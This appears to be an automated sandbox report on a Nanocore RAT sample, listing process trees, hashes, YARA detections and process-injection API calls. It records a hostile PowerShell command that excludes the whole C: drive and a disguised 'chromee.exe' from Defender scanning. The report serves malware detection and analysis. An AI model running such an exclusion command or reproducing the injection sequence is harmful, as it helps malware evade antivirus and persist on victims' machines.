Commandline:	'C:\Users\user\Desktop\ZVFVY7NwZ7.exe'
Imagebase:	0x980000
File size:	662016 bytes
MD5 hash:	8E87DE15CD3DA1245B9C7B0E48C0F126
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 1784 Parent PID: 2220

General

Start time:	11:11:05
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs'
Imagebase:	0x940000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ZVFVY7NwZ7.exe PID: 5612 Parent PID: 2220

General

Start time:	11:11:06
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe
Imagebase:	0xa40000
File size:	662016 bytes
MD5 hash:	8E87DE15CD3DA1245B9C7B0E48C0F126
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 3016 Parent PID: 1784

General

Start time:	11:11:07
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'
Imagebase:	0x2c0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4180 Parent PID: 3016

General

Start time:	11:11:07
Start date:	09/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ZVFVY7NwZ7.exe PID: 2220 Parent PID: 5828 ZVFVY7NwZ7.exeCOMMON

Executed Functions

Function 054A5B9D, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 054A5DDE

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b7196b79574c3a1fab4adb43750b02f8420c8d72c0e6d43ac53e54d67b501e9e
Instruction ID: eaf94d8b20ae604e9738b97d2266ce3b6999db45d63e20b95e2fb0addc9cb34f
Opcode Fuzzy Hash: b7196b79574c3a1fab4adb43750b02f8420c8d72c0e6d43ac53e54d67b501e9e
Instruction Fuzzy Hash: BF917C72D04219DFDF60CFA8C9447EEBAB2BF58314F1485AAD809A7340DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 054A5BA8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 054A5DDE

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e29f60b8819dde2034472abfcb061348a33163044622c28465f8a5a3d169411e
Instruction ID: a9bcaa02efa8db9988a9956296dcf1b99bf833ea6b297338021e1ae454326d7d
Opcode Fuzzy Hash: e29f60b8819dde2034472abfcb061348a33163044622c28465f8a5a3d169411e
Instruction Fuzzy Hash: 56915D72D042199FDF60CFA8C944BEEBBB2BF58314F1485AAD809A7340DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 054A69AC, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 054A6AB9

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: a49c59c09b1e81fa592587e26160336db9c17e838bcc5d6fd6b6148aa4fecab2
Instruction ID: 2ab82e164008382f8e7b80e48699ab35b3c8c2ef110bacfd2ede0809c23a3731
Opcode Fuzzy Hash: a49c59c09b1e81fa592587e26160336db9c17e838bcc5d6fd6b6148aa4fecab2
Instruction Fuzzy Hash: 3C4164B1D006188FCB14CF99C898BDEBBB1BF08314F19C06AE81AAB754C7749881CF91

Uniqueness

Uniqueness Score: -1.00%

Function 054A69B8, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 054A6AB9

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 3204064c0e94595bbb589a498c22d57532f3d2a05e2799f4a09e16d177b02a5d
Instruction ID: 4382c933e18ae89ec0e672da438fa74837ab8e8751148707351dd5a8e323ac72
Opcode Fuzzy Hash: 3204064c0e94595bbb589a498c22d57532f3d2a05e2799f4a09e16d177b02a5d
Instruction Fuzzy Hash: 9A414371D042188FCB14CFA9C898BDEBBB1BF48314F29C06AE81AAB744C7749845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054A1D40, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 054A1DE1

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 4d4ded9e73af28d870786de8b3374af6ea3f4ffbfdbb9ec19e115b8cf80872e8
Instruction ID: d7e55f21f277dc60a6cef636454c424e5d96200f726a5a808a79b2e5ac1bdf43
Opcode Fuzzy Hash: 4d4ded9e73af28d870786de8b3374af6ea3f4ffbfdbb9ec19e115b8cf80872e8
Instruction Fuzzy Hash: 932139B1D016198FCB50CF99D4847EEBBF5FF98320F14816AE808A7344D7749A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054A5998, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A5A30

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0e6883b38876492937f3a557b21a5f98fc6e09752b019bf2ffedcb1b88b0cdfd
Instruction ID: 4412e8e40b7a99bad46109f5d2a3917d4ba7a260647052e90c974de19260e735
Opcode Fuzzy Hash: 0e6883b38876492937f3a557b21a5f98fc6e09752b019bf2ffedcb1b88b0cdfd
Instruction Fuzzy Hash: 6C2135769003098FCF10CFA9C9857EEBBF5BF48314F04882AE919A7740D7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054A1D48, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 054A1DE1

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 31d1af067a48c66a85e0fe7da73329b5fd52826400517c287cfc4717ffe6addf
Instruction ID: 7c0c38975ec645fdee20dcb38dde8ef0e8bbc04a34b5c5acf985ee408f9e18b8
Opcode Fuzzy Hash: 31d1af067a48c66a85e0fe7da73329b5fd52826400517c287cfc4717ffe6addf
Instruction Fuzzy Hash: 51212BB1D016199FDB50CF99D4847EEFBF5EF58310F14816AE808A7341D7749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 054A59A0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A5A30

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 46cfe05ed8c45826edbf1ccee4f839bd53786651fc49b8ab0a6d3ac438f93e6e
Instruction ID: dcfb6052f223200255ed58e06573b8db462fe7f07d312d26514fd9465e5c197f
Opcode Fuzzy Hash: 46cfe05ed8c45826edbf1ccee4f839bd53786651fc49b8ab0a6d3ac438f93e6e
Instruction Fuzzy Hash: EA2115719003499FCF50CFA9C8847DEBBF5BF48314F50842AE959A7640D7789944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054A5740, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 054A57C6

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 319177f3383c5454e96225c3197e99a1a8b07005f0dd3af35c2dd8795b1df5e4
Instruction ID: b7f5702738b0eccacc583a06796fe21bab81b3353d433b2761892b91a7d23494
Opcode Fuzzy Hash: 319177f3383c5454e96225c3197e99a1a8b07005f0dd3af35c2dd8795b1df5e4
Instruction Fuzzy Hash: E6215776D003098FCB50CFA9C4847EEBBF4AF98324F54842AD459B7640CB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 054A6270, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 054A62FB

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 47f49e1e390c5c8521e272b6e73126a606f0a3dfa46e060a0fd0f4766d7b6125
Instruction ID: b1aac1c7fe95ee5c570cb3be14d221b9a1b3479e97003653db351d4abd814ef3
Opcode Fuzzy Hash: 47f49e1e390c5c8521e272b6e73126a606f0a3dfa46e060a0fd0f4766d7b6125
Instruction Fuzzy Hash: FF2125B2D016199FCB04CF99C985BDEFBB4BB08324F04852AE508A7740D77899448FA5

Uniqueness

Uniqueness Score: -1.00%

Function 054A5748, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 054A57C6

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: eb6719fde25402d6d5c6ad2eddfb5389c96dc5a16d064f04ec0fe0f20973f2a4
Instruction ID: 5f0c7a14ca9b3edeef08874d3ba3833f28a302145e38d8b5348c50595a941e07
Opcode Fuzzy Hash: eb6719fde25402d6d5c6ad2eddfb5389c96dc5a16d064f04ec0fe0f20973f2a4
Instruction Fuzzy Hash: CC213476D043098FCB50CFAAC4847EEBBF4AF98224F54842AD419A7640CB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A6278, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 054A62FB

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 38f72212d5e89bd8b976cf389a8077b68c2da28399a56f47ffce18bb91d38325
Instruction ID: 088f79617afefe0f7db4b932ac4af74db61f16e5149b6f80369f934e4ea747f1
Opcode Fuzzy Hash: 38f72212d5e89bd8b976cf389a8077b68c2da28399a56f47ffce18bb91d38325
Instruction Fuzzy Hash: C82104B2D016199FCB10CF9AC885BDEFBF4BB48310F04812AE518A7740D774A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 054A70BA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 054A7138

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 2876cbe9e88464ddb63a4c6672605c9de60070687d7b11adfd0a1b184bc7062f
Instruction ID: 250796cfacba9bf573c3f7c4f61cfaaa1752b85e4bef2034efc49b258691de75
Opcode Fuzzy Hash: 2876cbe9e88464ddb63a4c6672605c9de60070687d7b11adfd0a1b184bc7062f
Instruction Fuzzy Hash: 422177B2D002098FDB10CFA9C945BEEBBF5EF88310F14842AD415A7740DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A70C0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 054A7138

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 802e4dc65b56926ab896447608deab9acae400a1d702c519f3e34cfd48c3c896
Instruction ID: c94f0da436dbce7974bca1c86614252bbc739d8d1c7ebde979305b6c0c1fd4b9
Opcode Fuzzy Hash: 802e4dc65b56926ab896447608deab9acae400a1d702c519f3e34cfd48c3c896
Instruction Fuzzy Hash: 81213571D002098FDB50CF9AC844BEEBBF5EB88314F14842AE415A7740DB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A6808, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 054A6883

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 8bcad6a45e6cf8b03b9d325d0b3022518c7c8dda5cea2998099e8fb0834aaa1d
Instruction ID: a9b3f1556a1580f7582357e48efe048b970bce66f5b34c4156b5f1f3bcf4d643
Opcode Fuzzy Hash: 8bcad6a45e6cf8b03b9d325d0b3022518c7c8dda5cea2998099e8fb0834aaa1d
Instruction Fuzzy Hash: DD2127B6D002099FCB10CF99C544BDEBBF4BF48320F15842AE458A7600D7789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A6810, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 054A6883

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 94d29ec75f9a2deb6fed5ff4deef29f498846669d87d42e505f5145dae46c04c
Instruction ID: 65f1efac472366ae31b42155cf0eced57f17d22b7946910c370e474cfdd53b72
Opcode Fuzzy Hash: 94d29ec75f9a2deb6fed5ff4deef29f498846669d87d42e505f5145dae46c04c
Instruction Fuzzy Hash: 3121F4B6D002099FCB10CF9AC484BDEBBF4AF48320F15842AE559A7640D778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A58A9, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 054A591E

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 630779d9f10a79f16fc92dd22a15cc59d51cb41f529edd37bc7f8ef8d1518c6d
Instruction ID: fd61e500d6cacef308264b43200811483e03391f1a0e4aeda076b90c030e223d
Opcode Fuzzy Hash: 630779d9f10a79f16fc92dd22a15cc59d51cb41f529edd37bc7f8ef8d1518c6d
Instruction Fuzzy Hash: 7A115376D003098FCF10CFA9C9447EEBBF5AF58324F14882AE559AB650CB759944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054A58B0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 054A591E

Memory Dump Source

Source File: 00000000.00000002.344281416.00000000054A0000.00000040.00000001.sdmp, Offset: 054A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 35439eca1288c90a188f5c8d03187b8dc1e648964dd67306bde3431181db9d59
Instruction ID: a673d0d2040558bed6de16cdff4d91dfa21f10ff11270e27c3e0bb077e39470f
Opcode Fuzzy Hash: 35439eca1288c90a188f5c8d03187b8dc1e648964dd67306bde3431181db9d59
Instruction Fuzzy Hash: E2113A719002499FCF10CFA9C8447DFBBF5AF58324F14881AD515AB650C7759944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01130517, Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

l^, xrefs: 01130573

Memory Dump Source

Source File: 00000000.00000002.333356540.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false

Similarity

API ID:
String ID: l^
API String ID: 0-3718871828
Opcode ID: ab95100392875791ee7174a94e72dcc88c4a9795a6757136cd82369b2444997e
Instruction ID: f723126732364ac2e04b02389ef75623cd73d7258188d0df370e098adab65a84
Opcode Fuzzy Hash: ab95100392875791ee7174a94e72dcc88c4a9795a6757136cd82369b2444997e
Instruction Fuzzy Hash: 80010071F046119FC716EB28A8125EF7BF1EFC6210711892DE089E7241EB348E028B82

Uniqueness

Uniqueness Score: -1.00%

Function 01130528, Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

l^, xrefs: 01130573

Memory Dump Source

Source File: 00000000.00000002.333356540.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false

Similarity

API ID:
String ID: l^
API String ID: 0-3718871828
Opcode ID: 36353aa212cea6d7b74ce25de34b0d0292c03ac576605201ccfaafdf1a739ee9
Instruction ID: 1612f318f09de17244b7bf400f0d73f2e4bb9ec84f99e416d748bd89d98e6e9a
Opcode Fuzzy Hash: 36353aa212cea6d7b74ce25de34b0d0292c03ac576605201ccfaafdf1a739ee9
Instruction Fuzzy Hash: 4C01FD35B006048F8B09EB2DA8115AF7AF2EBC9250B118429E109EB244EB319E028BC2

Uniqueness

Uniqueness Score: -1.00%

Function 01135812, Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

V, xrefs: 01135842

Memory Dump Source

Source File: 00000000.00000002.333356540.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 014b9e9c589135bc55da81ca98dc0261bfefe4f83f058d7f3f9eb1e349e08289
Instruction ID: 999fca74cb60379051c5e182a004a38a92756a2840f6d9ed536d7cdd0ce2fa3b
Opcode Fuzzy Hash: 014b9e9c589135bc55da81ca98dc0261bfefe4f83f058d7f3f9eb1e349e08289
Instruction Fuzzy Hash: 0C1117B4942228CFDB34CF14C888BC9B7B4BB89340F0085D6D58AA7288C3B50BC9CF01

Uniqueness

Uniqueness Score: -1.00%

Function 011304A8, Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

Kl^, xrefs: 011304F5

Memory Dump Source

Source File: 00000000.00000002.333356540.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false

Similarity

API ID:
String ID: Kl^
API String ID: 0-3883499030
Opcode ID: d73bb52c83306552c388c6ce5ef622d681f2d59d592aca5f86a754ecc7cbf551
Instruction ID: 3f7306922d474139beb317fc3d7359b245da49822595ac223690d8bd2e4f6127
Opcode Fuzzy Hash: d73bb52c83306552c388c6ce5ef622d681f2d59d592aca5f86a754ecc7cbf551
Instruction Fuzzy Hash: ECF0B4303087109B871DE6299450A1B36D6ABCA598712C52DF156CB319EF319D0687E3

Uniqueness

Uniqueness Score: -1.00%

Function 01130600, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.333356540.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
